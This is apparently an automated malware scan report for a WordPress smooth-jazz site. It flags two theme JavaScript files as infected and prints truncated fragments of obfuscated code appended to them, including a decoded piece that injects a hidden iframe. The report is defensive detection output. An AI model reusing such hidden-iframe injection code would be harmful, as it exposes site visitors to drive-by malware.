Scanned pages/files
Request | Server response | Status |
http://www.urbansons.com/ | 200 OK Content-Length: 11195 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 992621wl416w7ueenfhneukvae.hop.clickbank.net <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Smooth Jazz, Smooth Jazz Artists, Smooth Jazz Music</title> <link rel="alternate" type="application/rss+xm ...[4303 bytes skipped]... | ||
http://www.urbansons.com/wp-content/themes/simplex/includes/js/suckerfish.js | 200 OK Content-Length: 7830 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) sfHover = function() { var sfEls = document.getElementById("page-list").getElementsByTagName("LI"); for (var i=0; i<sfEls.length; i++) { sfEls[i].onmouseover=function() { this.className+=" sfhover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" sfhover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover);try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e if(f)e(s);} Decoded script: function () { var sfEls = document.getElementById("page-list").getElementsByTagName("LI"); for (var i = 0; i < sfEls.length; i++) { sfEls[i].onmouseover = function () {this.className += " sfhover";}; sfEls[i].onmouseout = function () {this.className = this.className.replace(new RegExp(" sfhover\\b"), "");}; } } j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://www.urbansons.com/wp-content/plugins/wp-spamfree/js/wpsf-js.php | 200 OK Content-Length: 1526 Content-Type: application/x-javascript | clean |
http://www.urbansons.com/wp-content/themes/simplex/js/jquery-1.2.6.min.js | 200 OK Content-Length: 63215 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var _jQuery=window.jQuery,_$=window.$;var jQuery=window.jQuery=window.$=function(selector,context){return new jQuery.fn.init(selector,context);};var quickExpr=/^[^<]*(<(.|\s)+>)[^>]*$|^#(\w+)$/,isSimple=/^.[^:#\[\.]*$/,undefined;jQuery.fn=jQuery.prototype={init:function(selector,context){selector=selector||document;if(selector.nodeType){this[0]=selector;this.length=1;return this;}if(typeof selector=="string"){var match=quickExpr.exec(selector);if(match&&(match[1]| if(f)e(s);} /*qhk6sa6g1c*/ Antivirus reports:
| ||
http://ws.amazon.com/widgets/q?rt=tf_mfw&ServiceVersion=20070822&MarketPlace=US&ID=V20070822/US/urbsonsmojazb-20/8001/0d6663aa-232a-4809-95f8-ed54a2101ee9 | 200 OK Content-Length: 3289 Content-Type: application/javascript | clean |
http://cls.assoc-amazon.com/s/cls.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://cls.assoc-amazon.com/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: urbansons.com
Result:
GET / HTTP/1.1
Host: urbansons.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: urbansons.com
Referer: http://www.google.com/search?q=urbansons.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: urbansons.com
Referer: http://www.google.com/search?q=urbansons.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=urbansons.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://urbansons.com/
Result: urbansons.com is not infected or malware details are not published yet.
Result: urbansons.com is not infected or malware details are not published yet.